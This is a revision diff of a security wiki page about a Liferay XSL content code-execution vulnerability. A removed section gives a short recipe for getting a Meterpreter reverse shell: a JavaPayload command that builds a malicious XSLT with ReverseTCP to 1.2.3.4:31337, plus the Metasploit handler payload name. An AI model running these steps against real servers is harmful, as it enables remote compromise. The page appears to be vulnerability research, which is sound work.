Changes for page Application_Liferay

Last modified by Nicolas Gregoire on 2012/04/19 14:05
From version Icon 25.1
edited by Nicolas Gregoire
on 2012/04/19 14:05
Change comment: There is no comment for this version
To version Icon 23.1 Icon
edited by Nicolas Gregoire
on 2012/01/17 09:24
Change comment: There is no comment for this version

Summary

Details

Icon Page properties
Tags
... ... @@ -1,1 +1,1 @@
1 -liferay|java|xalan-j|code execution|XEE
1 +liferay|java|xalan-j|code execution|xee
Content
... ... @@ -14,14 +14,6 @@
14 14  
15 15  [[image:liferay-execute-commands-with-stdout.png||style="display: block; margin-left: auto; margin-right: auto"]]
16 16  
17 -= Meterpreter shell =
18 -
19 -As described in [[Feature #6594: Liferay XSL Command Execution>>http://dev.metasploit.com/redmine/issues/6594||rel="__blank"]], here's a way to gain a Meterpreter shell with this vulnerability :
20 -
21 -- stand-alone JavaPayload to generate the XSLT stylesheet (java jar JavaPayload.jar Builder Template XalanJ.xsl output.xsl ReverseTCP 1.2.3.4 31337 - - JSh)
22 -- Metasploit to handle the Meterpreter connection (PAYLOAD=java/meterpreter/reverse_tcp)
23 -- Manual interaction to trigger the vulnerability (browser)
24 -
25 25  = Additional vulnerabilities =
26 26  
27 27  Two others vulnerabilities were identified in the "XSL Content" portlet :